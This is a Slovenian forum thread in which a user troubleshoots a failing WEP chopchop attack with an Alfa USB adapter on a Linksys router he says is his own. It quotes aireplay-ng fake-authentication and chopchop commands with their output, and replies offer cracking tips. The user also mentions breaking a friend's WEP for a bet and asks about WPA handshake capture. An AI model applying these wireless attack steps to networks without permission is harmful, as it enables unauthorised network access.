Forum » Omrežja in internet » Alfa USB card chop chop
Alfa USB card chop chop
Yacked2 ::
Pozdravljeni, kupil sem si Alfa USB AWUS036NH wifi adapter, sedaj pa se pojavi problem. Moja tarča je moj router Linksys z WEP zaščito. Če ga napadam od brizu mi use fragment napad ter vse deluje vredu. Sedaj sem pa nesel router v garažo (signala je -70) sedaj je povezava prešibka za fragment napad zato sem se odločil za chop chop napad, moj postopek:
najprej:
aireplay-ng -1 0 -a BSSID -h MYMAC mon0
ter nato:
aireplay-ng -4 -b BSSID -h MYMAC mon0
"yes"
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
in tako naprej. Nato sem poizkusil z :
aireplay-ng -1 6000 -o 1 -q 10 -a BSSID -h MYMAC mon0
09:46:19 Waiting for beacon frame (BSSID:) on channel 2
09:46:19 Sending Authentication Request (Open System) [ACK]
09:46:19 Authentication successful
09:46:19 Sending Association Request [ACK]
09:46:19 Association successful :-) (AID: 1)
09:46:29 Sending keep-alive packet [ACK]
09:46:39 Sending keep-alive packet [ACK]
09:46:39 Got a deauthentication packet! (Waiting 3 seconds)
09:46:42 Sending Authentication Request (Open System) [ACK]
09:46:42 Authentication successful
09:46:42 Sending Association Request [ACK]
09:46:42 Association successful :-) (AID: 1)
09:46:52 Sending keep-alive packet [ACK]
09:47:02 Sending keep-alive packet [ACK]
09:47:12 Sending keep-alive packet [ACK]
09:47:22 Sending keep-alive packet [ACK]
09:47:32 Sending keep-alive packet [ACK]
09:47:42 Sending keep-alive packet [ACK]
09:47:42 Got a deauthentication packet! (Waiting 3 seconds)
09:47:45 Sending Authentication Request (Open System) [ACK]
09:47:45 Authentication successful
09:47:45 Sending Association Request [ACK]
09:47:45 Association successful :-) (AID: 1)
09:47:55 Sending keep-alive packet [ACK]
09:48:05 Sending keep-alive packet [ACK]
09:48:15 Sending keep-alive packet [ACK]
ter nato ponovno chop chop napad:
aireplay-ng -4 -b BSSID -h MYMAC mon0
Use this packet ? y
Saving chosen packet in replay_src-0119-094837.cap
Sent 1716 packets, current guess: AD...
The chopchop attack appears to have failed. Possible reasons:
* You're trying to inject with an unsupported chipset (Centrino?).
* The driver source wasn't properly patched for injection support.
* You are too far from the AP. Get closer or reduce the send rate.
* Target is 802.11g only but you are using a Prism2 or RTL8180.
* The wireless interface isn't setup on the correct channel.
* The client MAC you have specified is not currently authenticated.
Try running another aireplay-ng to fake authentication (attack "-1").
* The AP isn't vulnerable when operating in authenticated mode.
Try aireplay-ng in non-authenticated mode instead (no -h option).
No ja...vglavnem ne deluje. Router je zagotovo ranljiv na to vrsto napada saj sem ga uspel "hackati" z drugo mrežno kartico od TP-LINKA.
Imate kakšen nasvet ?
najprej:
aireplay-ng -1 0 -a BSSID -h MYMAC mon0
ter nato:
aireplay-ng -4 -b BSSID -h MYMAC mon0
"yes"
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
in tako naprej. Nato sem poizkusil z :
aireplay-ng -1 6000 -o 1 -q 10 -a BSSID -h MYMAC mon0
09:46:19 Waiting for beacon frame (BSSID:) on channel 2
09:46:19 Sending Authentication Request (Open System) [ACK]
09:46:19 Authentication successful
09:46:19 Sending Association Request [ACK]
09:46:19 Association successful :-) (AID: 1)
09:46:29 Sending keep-alive packet [ACK]
09:46:39 Sending keep-alive packet [ACK]
09:46:39 Got a deauthentication packet! (Waiting 3 seconds)
09:46:42 Sending Authentication Request (Open System) [ACK]
09:46:42 Authentication successful
09:46:42 Sending Association Request [ACK]
09:46:42 Association successful :-) (AID: 1)
09:46:52 Sending keep-alive packet [ACK]
09:47:02 Sending keep-alive packet [ACK]
09:47:12 Sending keep-alive packet [ACK]
09:47:22 Sending keep-alive packet [ACK]
09:47:32 Sending keep-alive packet [ACK]
09:47:42 Sending keep-alive packet [ACK]
09:47:42 Got a deauthentication packet! (Waiting 3 seconds)
09:47:45 Sending Authentication Request (Open System) [ACK]
09:47:45 Authentication successful
09:47:45 Sending Association Request [ACK]
09:47:45 Association successful :-) (AID: 1)
09:47:55 Sending keep-alive packet [ACK]
09:48:05 Sending keep-alive packet [ACK]
09:48:15 Sending keep-alive packet [ACK]
ter nato ponovno chop chop napad:
aireplay-ng -4 -b BSSID -h MYMAC mon0
Use this packet ? y
Saving chosen packet in replay_src-0119-094837.cap
Sent 1716 packets, current guess: AD...
The chopchop attack appears to have failed. Possible reasons:
* You're trying to inject with an unsupported chipset (Centrino?).
* The driver source wasn't properly patched for injection support.
* You are too far from the AP. Get closer or reduce the send rate.
* Target is 802.11g only but you are using a Prism2 or RTL8180.
* The wireless interface isn't setup on the correct channel.
* The client MAC you have specified is not currently authenticated.
Try running another aireplay-ng to fake authentication (attack "-1").
* The AP isn't vulnerable when operating in authenticated mode.
Try aireplay-ng in non-authenticated mode instead (no -h option).
No ja...vglavnem ne deluje. Router je zagotovo ranljiv na to vrsto napada saj sem ga uspel "hackati" z drugo mrežno kartico od TP-LINKA.
Imate kakšen nasvet ?
krop ::
Pa imaš promet na routerju, ker drugače nebo nič ;) Aja pa paketkov prestreženih moraš imeti min 10000 do 30000 vsaj tako je bilo pr meni
Zgodovina sprememb…
- spremenil: krop ()
Yacked2 ::
Vem koliko moram imeti prometa. Mislim da je problem v Alfa kartici, ker napad preko Tp-link kartice deluje brez težav
Korak naprej ni vedno ustrezen...sploh če si na robu prepada!
fosil ::
Malenkost offtopic.
Kako dobro pa ti lovi tale kartica?
Recimo v primerjavi s tplink, ki jo omenjaš (kater model imaš?).
Kako dobro pa ti lovi tale kartica?
Recimo v primerjavi s tplink, ki jo omenjaš (kater model imaš?).
Tako je!
Yacked2 ::
BLACKBFM: fora je da mi injection uspe na dolge razdalje, pravkar sem dobil stavo z prijateljem, ko sem mu na -85 signala zlomil WEP zaščito z chopchop napadom, z mojo TP-LINK kartico, z Alfa kartico pa nimam več živcev :/
FOSIL: imam Alfa AWUS036NH ter TP-LINK TL-WN722N ter polmetersko omi anteno. Alfa kartica je močnejša kot TP-LINK, primer:
Alfa: signal: -77
TP-LINK: signal: -85
Za lomljenje WPA handshaka je dovolj samo 1 in 2 del ali potrebujem vse ? Še vedno me zanima zakaj chopchop ne deluje na Alfa kartici
FOSIL: imam Alfa AWUS036NH ter TP-LINK TL-WN722N ter polmetersko omi anteno. Alfa kartica je močnejša kot TP-LINK, primer:
Alfa: signal: -77
TP-LINK: signal: -85
Za lomljenje WPA handshaka je dovolj samo 1 in 2 del ali potrebujem vse ? Še vedno me zanima zakaj chopchop ne deluje na Alfa kartici
Korak naprej ni vedno ustrezen...sploh če si na robu prepada!
blackbfm ::
Še vedno me zanima zakaj chopchop ne deluje na Alfa kartici
nevem za konkreten primer, vendar če ti na eni deluje ne drugi pa ne potem si verjetno naletu na omejitev driverja ali čipseta..
Yacked2 ::
Še vedno me zanima zakaj chopchop ne deluje na Alfa kartici
nevem za konkreten primer, vendar če ti na eni deluje ne drugi pa ne potem si verjetno naletu na omejitev driverja ali čipseta..
Amm...sem probal več tarč pa ni nikjer delovalo (poiskusil sem LiveCD, Vmware..)
Korak naprej ni vedno ustrezen...sploh če si na robu prepada!
krop ::
Probaj beini lahko ga laufaš prek vmware. je zelo enostaven. Alfa kartica je pa itak znana kot najboljša. Mogoče te drajverji hecajo?
Yacked2 ::
Zagotovi so gonilniki -.- Saj drugega nevem....uspel mi je le fragment napad, vse ostalo pa nedeluje
Korak naprej ni vedno ustrezen...sploh če si na robu prepada!
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | Linksys WRT54GL (strani: 1 2 )Oddelek: Pomoč in nasveti | 6779 (3134) | Senitel |
» | PHP & XAMPP file_get_contentsOddelek: Izdelava spletišč | 1372 (1152) | KoMar- |
» | wpasupplicant in SD LJOddelek: Omrežja in internet | 1651 (1465) | r5r |
» | kaj nastavim pri ruterju linksys (slika)Oddelek: Omrežja in internet | 913 (839) | enrique |
» | how to hack a site???Oddelek: Pomoč in nasveti | 1832 (1534) | StratOS |